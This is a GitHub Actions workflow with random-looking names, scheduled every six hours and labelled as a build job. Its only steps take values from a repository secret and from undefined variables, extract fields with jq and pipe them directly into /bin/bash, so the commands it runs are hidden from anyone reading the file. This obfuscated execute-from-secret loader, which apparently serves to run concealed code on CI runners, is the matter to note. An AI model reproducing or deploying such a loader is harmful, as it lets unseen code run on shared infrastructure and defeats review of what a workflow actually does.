name: fangziwenni
on:
  workflow_dispatch:
  schedule:
    - cron: '31 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fangziwenni
        env:
          yf42791: ${{ secrets.yf42791 }}
        run: |
          echo $yf42791 | jq -r .x090 | /bin/bash
          echo $vvm6926 | jq -r .l287 | /bin/bash
          echo $e25201 | jq -r .j7 | /bin/bash
          echo $s5079 | jq -r .i88101 | /bin/bash
          echo $hrqts13952 | jq -r .ipofh077 | /bin/bash
          echo $z1594 | jq -r .k46 | /bin/bash
          echo $tan63 | jq -r .c72 | /bin/bash
          echo $bsit3 | jq -r .f62 | /bin/bash
          echo $za3 | jq -r .ej99 | /bin/bash

